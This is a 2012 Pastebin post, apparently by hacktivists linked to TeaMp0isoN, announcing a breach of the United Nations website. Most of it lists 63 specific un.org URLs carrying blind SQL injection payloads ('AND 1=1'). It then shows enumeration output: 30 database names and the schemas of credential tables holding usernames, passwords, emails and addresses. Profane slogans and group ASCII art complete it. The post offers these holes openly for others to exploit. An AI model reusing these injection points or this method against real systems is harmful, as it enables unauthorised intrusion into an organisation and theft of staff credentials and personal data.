Pastebin launched a little side project called VERYVIRAL.com, check it out ;-) Want more features on Pastebin? Sign Up, it's FREE!
Guest

UN.org Hacked by Casi

By: a guest on Feb 9th, 2012  |  syntax: None  |  size: 17.09 KB  |  views: 21,616  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. United Nations Hacked by Casi
  2.  
  3. What is this ?
  4.  
  5. The United Nations (UN) is an international organization whose stated aims are facilitating cooperation in international law, international security, economic development, social progress, human rights, and achievement of world peace. The UN was founded in 1945 after World War II to replace the League of Nations, to stop wars between countries, and to provide a platform for dialogue. It contains multiple subsidiary organizations to carry out its missions.
  6.  
  7. There are currently 193 member states, including every internationally recognised sovereign state in the world but Vatican City. From its offices around the world, the UN and its specialized agencies decide on substantive and administrative issues in regular meetings held throughout the year. The organization has six principal organs: the General Assembly (the main deliberative assembly); the Security Council (for deciding certain resolutions for peace and security); the Economic and Social Council (for assisting in promoting international economic and social cooperation and development); the Secretariat (for providing studies, information, and facilities needed by the UN); the International Court of Justice (the primary judicial organ); and the United Nations Trusteeship Council (which is currently inactive). Other prominent UN System agencies include the World Health Organization (WHO), the World Food Programme (WFP) and United Nations Children's Fund (UNICEF).
  8.  
  9. # Why did you hack it ?
  10. I fuck actually system... I fighting for Internet Freedom, equiality & rights for all. You're FREEDOM my brothers & my sisters ! <3
  11.  
  12. ##########################################################################################################
  13.  
  14. Target → www.un.org
  15.  
  16. ACP → in robots.txt...
  17.  
  18. Vulnerability → BSQLi I give vulnerabilities because it's fucking asshole ! We are FREEDOm !
  19. Code:
  20.  
  21. | [+] Vul[1] [Blind SQL-i]: http://www.un.org/mobile/news_fullstory.asp?NewsID=41172+AND+1=1&Cr=Syria&Cr1=              
  22. | [+] Vul[2] [Blind SQL-i]: http://www.un.org/mobile/media_alert.asp?Date=2/8/2012+AND+1=1              
  23. | [+] Vul[3] [Blind SQL-i]: http://www.un.org/mobile/news_fullstory.asp?NewsID=41174+AND+1=1&Cr=South+Sudan&Cr1=              
  24. | [+] Vul[4] [Blind SQL-i]: http://www.un.org/mobile/news_fullstory.asp?NewsID=41172&Cr=Syria+AND+1=1&Cr1=              
  25. | [+] Vul[5] [Blind SQL-i]: http://www.un.org/apps/news/subject.asp?SubjectID=2+AND+1=1              
  26. | [+] Vul[6] [Blind SQL-i]: http://www.un.org/apps/news/subject.asp?SubjectID=5+AND+1=1              
  27. | [+] Vul[7] [Blind SQL-i]: http://www.un.org/apps/news/subject.asp?SubjectID=4+AND+1=1              
  28. | [+] Vul[8] [Blind SQL-i]: http://www.un.org/apps/news/subject.asp?SubjectID=1+AND+1=1              
  29. | [+] Vul[9] [Blind SQL-i]: http://www.un.org/apps/news/photostories_detail.asp?PsID=74+AND+1=1              
  30. | [+] Vul[10] [Blind SQL-i]: http://www.un.org/apps/news/subject.asp?SubjectID=3+AND+1=1              
  31. | [+] Vul[11] [Blind SQL-i]: http://www.un.org/apps/news/infocusRel.asp?infocusID=91&Body=Haiti+AND+1=1&Body1=              
  32. | [+] Vul[12] [Blind SQL-i]: http://www.un.org/apps/news/infocusRel.asp?infocusID=91&Body=Haiti&Body1=+AND+1=1              
  33. | [+] Vul[13] [Blind SQL-i]: http://www.un.org/spanish/News/focus.asp?focusID=13+AND+1=1              
  34. | [+] Vul[14] [Blind SQL-i]: http://www.un.org/works/sub2.asp?lang=en&s=11+AND+1=1              
  35. | [+] Vul[15] [Blind SQL-i]: http://www.un.org/works/sub2.asp?lang=en&s=12+AND+1=1              
  36. | [+] Vul[16] [Blind SQL-i]: http://www.un.org/disabilities/default.asp?navid=48+AND+1=1&pid=38              
  37. | [+] Vul[17] [Blind SQL-i]: http://www.un.org/works/sub2.asp?lang=en&s=36+AND+1=1              
  38. | [+] Vul[18] [Blind SQL-i]: http://www.un.org/mobile/sgstats_fullstory.asp?nid=5844+AND+1=1              
  39. | [+] Vul[19] [Blind SQL-i]: http://www.un.org/mobile/media_alert.asp?Date=2/8/Templates/global.css+AND+1=1              
  40. | [+] Vul[20] [Blind SQL-i]: http://www.un.org/apps/newsFr/subject.asp?SubjectID=1+AND+1=1              
  41. | [+] Vul[21] [Blind SQL-i]: http://www.un.org/apps/newsFr/subject.asp?SubjectID=4+AND+1=1              
  42. | [+] Vul[22] [Blind SQL-i]: http://www.un.org/apps/newsFr/subject.asp?SubjectID=3+AND+1=1              
  43. | [+] Vul[23] [Blind SQL-i]: http://www.un.org/apps/newsFr/morenews.asp?Cr=Soudan+AND+1=1&Cr1=              
  44. | [+] Vul[24] [Blind SQL-i]: http://www.un.org/apps/newsFr/infocusRelF.asp?infocusID=50&Body=Ha�ti+AND+1=1&Body1=              
  45. | [+] Vul[25] [Blind SQL-i]: http://www.un.org/sg/travels.asp?cote=sg/t+AND+1=1&Nb=20              
  46. | [+] Vul[26] [Blind SQL-i]: http://www.un.org/en/unpress/highlights.asp?orand=AND&BeginDate=30-JAN-2012&EndDate=10-FEB-2012&keywords=&sw=all&symbol=SOC%2F4&FIND=Find+AND+1=1              
  47. | [+] Vul[27] [Blind SQL-i]: http://www.un.org/apps/news/infocus/sgspeeches/keyword_search.asp?Body=Democratic+Republic+of+the+Congo              
  48. | [+] Vul[28] [Blind SQL-i]: http://www.un.org/ga/search/view_doc.asp?symbol=A/63/50+AND+1=1&Lang=E              
  49. | [+] Vul[29] [Blind SQL-i]: http://www.un.org/News/ossg/hilites/hilites_arch_view.asp?HighID=1026+AND+1=1              
  50. | [+] Vul[30] [Blind SQL-i]: http://www.un.org/News/ossg/hilites/hilites_arch_view.asp?HighID=1025+AND+1=1              
  51. | [+] Vul[31] [Blind SQL-i]: http://www.un.org/apps/newsFr/storyFAr.asp?NewsID=6314+AND+1=1&Cr=Iraq&Cr1=              
  52. | [+] Vul[32] [Blind SQL-i]: http://www.un.org/chinese/News/focus.asp?focusID=20+AND+1=1              
  53. | [+] Vul[33] [Blind SQL-i]: http://www.un.org/ecosoc/docs/resdec.asp?type=1+AND+1=1&year=2007              
  54. | [+] Vul[34] [Blind SQL-i]: http://www.un.org/Pubs/CyberSchoolBus/infonation3/topic_blue-chart_loader.asp?cat=1+AND+1=1&stat1=73&stat2=73&stat3=73&stat4=73&stat5=73&stat6=73              
  55. | [+] Vul[35] [Blind SQL-i]: http://www.un.org/arabic/news/focus.asp?focus1=middleeast&focusID=3+AND+1=1              
  56. | [+] Vul[36] [Blind SQL-i]: http://www.un.org/arabic/news/focus.asp?focus1=iraq&focusID=6+AND+1=1&subjects=              
  57. | [+] Vul[37] [Blind SQL-i]: http://www.un.org/arabic/news/focus.asp?focus1=hr&focusID=16+AND+1=1              
  58. | [+] Vul[38] [Blind SQL-i]: http://www.un.org/arabic/news/focus.asp?focus1=sudan&focusID=7&subjects=+AND+1=1              
  59. | [+] Vul[39] [Blind SQL-i]: http://www.un.org/Pubs/CyberSchoolBus/mdgs/goal.asp?iGoal=9&iLang=en+AND+1=1&iKeyword=about              
  60. | [+] Vul[40] [Blind SQL-i]: http://www.un.org/Pubs/CyberSchoolBus/mdgs/goal.asp?iGoal=9&iLang=en&iKeyword=about+AND+1=1              
  61. | [+] Vul[41] [Blind SQL-i]: http://www.un.org/disabilities/countries.asp?navid=17&pid=166+AND+1=1              
  62. | [+] Vul[42] [Blind SQL-i]: http://www.un.org/en/members/countryinfo.asp?countryname=Algeria+AND+1=1              
  63. | [+] Vul[43] [Blind SQL-i]: http://www.un.org/fr/unpress/index_unbodies.asp?unpress=1+AND+1=1&unBodies=4              
  64. | [+] Vul[44] [Blind SQL-i]: http://www.un.org/fr/unpress/level2.asp?unpress=6+AND+1=1              
  65. | [+] Vul[45] [Blind SQL-i]: http://www.un.org/fr/unpress/highlights.asp?orand=AND+AND+1=1&BeginDate=1%2F30%2F2012&EndDate=2%2F10%2F2012&keywords=+&sw=all&symbol=soc%2F4&FIND=Rechercher              
  66. | [+] Vul[46] [Blind SQL-i]: http://www.un.org/apps/news/sg_stats.asp?Body=Libya&DateD=01/01/2011+AND+1=1              
  67. | [+] Vul[47] [Blind SQL-i]: http://www.un.org/fr/unpress/index_unbodies.asp?unpress=31&unBodies=2+AND+1=1              
  68. | [+] Vul[48] [Blind SQL-i]: http://www.un.org/russian/news/subject_bydate.asp?subj=HR+AND+1=1              
  69. | [+] Vul[49] [Blind SQL-i]: http://www.un.org/ru/unsystem/category.asp?classificationF=205+AND+1=1              
  70. | [+] Vul[50] [Blind SQL-i]: http://www.un.org/zh/members/countryinfo.asp?countryname=argentina+AND+1=1              
  71. | [+] Vul[51] [Blind SQL-i]: http://www.un.org/zh/documents/view.asp?symbol=A/RES/47/225+AND+1=1&Lang=C              
  72. | [+] Vul[52] [Blind SQL-i]: http://www.un.org/zh/documents/view.asp?symbol=A/RES/46/237&Lang=C+AND+1=1              
  73. | [+] Vul[53] [Blind SQL-i]: http://www.un.org/zh/documents/view_doc.asp?symbol=ST/SGB/2010/9+AND+1=1              
  74. | [+] Vul[54] [Blind SQL-i]: http://www.un.org/zh/documents/view_doc.asp?symbol=ST/CS/61+AND+1=1              
  75. | [+] Vul[55] [Blind SQL-i]: http://www.un.org/chinese/News/archive.asp?date=2/2/2012+AND+1=1              
  76. | [+] Vul[56] [Blind SQL-i]: http://www.un.org/zh/focus/northafrica/newsdetails.asp?newsID=15066+AND+1=1&criteria=libya              
  77. | [+] Vul[57] [Blind SQL-i]: http://www.un.org/zh/focus/northafrica/newsdetails.asp?newsID=16277&criteria=libya+AND+1=1              
  78. | [+] Vul[58] [Blind SQL-i]: http://www.un.org/arabic/disabilities/default.asp?navid=12&pid=655+AND+1=1              
  79. | [+] Vul[59] [Blind SQL-i]: http://www.un.org/disarmament/HomePage/gender/?lang=fr+AND+1=1              
  80. | [+] Vul[60] [Blind SQL-i]: http://www.un.org/disarmament/HomePage/eportfolio/?lang=fr+AND+1=1              
  81. | [+] Vul[61] [Blind SQL-i]: http://www.un.org/arabic/disabilities/default?id=178+AND+1=1              
  82. | [+] Vul[62] [Blind SQL-i]: http://www.un.org/russian/disabilities/default.asp?navid=40+AND+1=1&pid=650              
  83. | [+] Vul[63] [Blind SQL-i]: http://www.un.org/works/sub3.asp?lang=en+AND+1=1&
  84.  
  85. ##########################################################################################################
  86.  
  87. databases [30]:
  88. [*] arabNews
  89. [*] ChineseNews
  90. [*] Cted_Auth
  91. [*] dept1
  92. [*] DpiNgoAccred
  93. [*] ecosoc
  94. [*] EOS
  95. [*] EOS_RES
  96. [*] gidbase
  97. [*] master
  98. [*] model
  99. [*] msdb
  100. [*] News
  101. [*] NewsF
  102. [*] ngodpi
  103. [*] perfmon
  104. [*] Press
  105. [*] Radionews
  106. [*] RESTORE
  107. [*] RussianNews
  108. [*] sg
  109. [*] smsdb
  110. [*] SpanishNews
  111. [*] tempdb
  112. [*] tempnews
  113. [*] UNFAQ
  114. [*] UNORGAdmin
  115. [*] unsaocc
  116. [*] wwatch
  117. [*] wwwauth
  118.  
  119. Database: wwwauth
  120. Table: dbo.icscquest_auth_old
  121. [17 columns]
  122. +------------+----------+
  123. | Column     | Type     |
  124. +------------+----------+
  125. | Address    | nvarchar |
  126. | City       | nvarchar |
  127. | DepartLong | nvarchar |
  128. | Department | nvarchar |
  129. | Email      | nvarchar |
  130. | FaxNo      | nvarchar |
  131. | FirstName  | nvarchar |
  132. | groups     | nvarchar |
  133. | LastName   | nvarchar |
  134. | NameID     | int      |
  135. | passwd     | nvarchar |
  136. | PhoneNo    | nvarchar |
  137. | Salut      | nvarchar |
  138. | State      | nvarchar |
  139. | Title      | nvarchar |
  140. | username   | nvarchar |
  141. | ZipCode    | nvarchar |
  142. +------------+----------+
  143.  
  144. Database: wwwauth
  145. Table: dbo.news_auth
  146. [3 columns]
  147. +----------+---------+
  148. | Column   | Type    |
  149. +----------+---------+
  150. | groups   | varchar |
  151. | passwd   | varchar |
  152. | username | varchar |
  153. +----------+---------+
  154.  
  155. Database: wwwauth
  156. Table: dbo.newsF_auth
  157. [3 columns]
  158. +----------+---------+
  159. | Column   | Type    |
  160. +----------+---------+
  161. | groups   | varchar |
  162. | passwd   | varchar |
  163. | username | varchar |
  164. +----------+---------+
  165.  
  166. Database: wwwauth
  167. Table: dbo.icsc_auth
  168. [17 columns]
  169. +------------+---------+
  170. | Column     | Type    |
  171. +------------+---------+
  172. | Address    | varchar |
  173. | City       | varchar |
  174. | DepartLong | varchar |
  175. | Department | varchar |
  176. | Email      | varchar |
  177. | FaxNo      | varchar |
  178. | FirstName  | varchar |
  179. | groups     | varchar |
  180. | LastName   | varchar |
  181. | NameID     | int     |
  182. | passwd     | varchar |
  183. | PhoneNo    | varchar |
  184. | Salut      | varchar |
  185. | State      | varchar |
  186. | Title      | varchar |
  187. | username   | varchar |
  188. | ZipCode    | varchar |
  189. +------------+---------+
  190.  
  191. Database: wwwauth
  192. Table: dbo.sms_auth
  193. [3 columns]
  194. +----------+---------+
  195. | Column   | Type    |
  196. +----------+---------+
  197. | groups   | varchar |
  198. | passwd   | varchar |
  199. | username | varchar |
  200. +----------+---------+
  201.  
  202. Database: wwwauth
  203. Table: dbo.icscquest_auth
  204. [17 columns]
  205. +------------+----------+
  206. | Column     | Type     |
  207. +------------+----------+
  208. | Address    | nvarchar |
  209. | City       | nvarchar |
  210. | DepartLong | nvarchar |
  211. | Department | nvarchar |
  212. | Email      | nvarchar |
  213. | FaxNo      | nvarchar |
  214. | FirstName  | nvarchar |
  215. | groups     | varchar  |
  216. | LastName   | nvarchar |
  217. | NameID     | int      |
  218. | passwd     | varchar  |
  219. | PhoneNo    | nvarchar |
  220. | Salut      | nvarchar |
  221. | State      | nvarchar |
  222. | Title      | nvarchar |
  223. | username   | varchar  |
  224. | ZipCode    | nvarchar |
  225. +------------+----------+
  226.  
  227. Database: wwwauth
  228. Table: dbo.tds_auth
  229. [4 columns]
  230. +----------+----------+
  231. | Column   | Type     |
  232. +----------+----------+
  233. | groups   | nvarchar |
  234. | NameID   | int      |
  235. | passwd   | nvarchar |
  236. | username | nvarchar |
  237. +----------+----------+
  238.  
  239. Database: wwwauth
  240. Table: dbo.dtproperties
  241. [7 columns]
  242. +----------+----------+
  243. | Column   | Type     |
  244. +----------+----------+
  245. | id       | int      |
  246. | lvalue   | image    |
  247. | objectid | int      |
  248. | property | varchar  |
  249. | uvalue   | nvarchar |
  250. | value    | varchar  |
  251. | version  | int      |
  252. +----------+----------+
  253.  
  254. Database: wwwauth
  255. Table: dbo.syssegments
  256. [3 columns]
  257. +---------+---------+
  258. | Column  | Type    |
  259. +---------+---------+
  260. | name    | varchar |
  261. | segment | int     |
  262. | status  | int     |
  263. +---------+---------+
  264.  
  265. Database: wwwauth
  266. Table: dbo.sysconstraints
  267. [7 columns]
  268. +---------+----------+
  269. | Column  | Type     |
  270. +---------+----------+
  271. | actions | int      |
  272. | colid   | smallint |
  273. | constid | int      |
  274. | error   | int      |
  275. | id      | int      |
  276. | spare1  | tinyint  |
  277. | status  | int      |
  278. +---------+----------+
  279.  
  280. Database: wwwauth
  281. Table: dbo.icsc_auth_old
  282. [17 columns]
  283. +------------+----------+
  284. | Column     | Type     |
  285. +------------+----------+
  286. | Address    | nvarchar |
  287. | City       | nvarchar |
  288. | DepartLong | nvarchar |
  289. | Department | nvarchar |
  290. | Email      | nvarchar |
  291. | FaxNo      | nvarchar |
  292. | FirstName  | nvarchar |
  293. | groups     | nvarchar |
  294. | LastName   | nvarchar |
  295. | NameID     | int      |
  296. | passwd     | nvarchar |
  297. | PhoneNo    | nvarchar |
  298. | Salut      | nvarchar |
  299. | State      | nvarchar |
  300. | Title      | nvarchar |
  301. | username   | nvarchar |
  302. | ZipCode    | nvarchar |
  303. +------------+----------+
  304.  
  305. ##########################################################################################################
  306.  
  307. Data Dumped.
  308.    _______         __  __        ___  _           _   _
  309.   |__   __|       |  \/  |      / _ \(_)         | \ | |
  310.      | | ___  __ _| \  / |_ __ | | | |_ ___  ___ |  \| |
  311.      | |/ _ \/ _` | |\/| | '_ \| | | | / __|/ _ \| . ` |
  312.      | |  __/ (_| | |  | | |_) | |_| | \__ \ (_) | |\  |
  313.      |_|\___|\__,_|_|  |_| .__/ \___/|_|___/\___/|_| \_|
  314.                        | |                            
  315.                        |_| [TeaMp0isoN: TriCk, iN^SaNe, MLT,
  316.                             Phantom~, C0RPS3, f0rsaken, aXioM, ap0calypse.]
  317.  
  318. 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
  319. 0             __      __   __                   __                           1
  320. 1           /'__`\  /'__`\/\ \__              /'__`\                         0
  321. 0     _ __ /\ \/\ \/\ \/\ \ \ ,_\  __  __  __/\ \/\ \  _ __    ___ ___       1
  322. 1    /\`'__\ \ \ \ \ \ \ \ \ \ \/ /\ \/\ \/\ \ \ \ \ \/\`'__\/' __` __`\     0
  323. 0    \ \ \/ \ \ \_\ \ \ \_\ \ \ \_\ \ \_/ \_/ \ \ \_\ \ \ \/ /\ \/\ \/\ \    1
  324. 1     \ \_\  \ \____/\ \____/\ \__\\ \___x___/'\ \____/\ \_\ \ \_\ \_\ \_\   0
  325. 0      \/_/   \/___/  \/___/  \/__/ \/__//__/   \/___/  \/_/  \/_/\/_/\/_/   1
  326. 1                                                                            0
  327. 0                                                                            1
  328. 1                                                                            0
  329. 0                                       >> author : Xenu                     1
  330. 1                                       >> Thank :                           0
  331. 0 Cross Satsura Ataman HOAX DreamDatabase Dark-X s3rver.exe L0rd CrusAd3r    1
  332. 1  and other members of RW                                                   0
  333. 0                                                                            1
  334. 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-0
  335.  
  336. 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
  337. 0    __                  ____          __      ____                    1
  338. 1   /' \            __  /'__`\        /\ \__  /'__`\                   0
  339. 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
  340. 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
  341. 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
  342. 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\ \__\ \ \____/\ \_\           0
  343. 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
  344. 1                  \ \____/                                            0
  345. 0                   \/___/                                             1
  346. 1                                       >> r0073r                      0 0                                       >> Sid3^effects                1
  347. 1                                       >> r4dc0re                     0                  
  348. 0                                       >> CrosS                       1
  349. 1                                                                      0
  350. 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0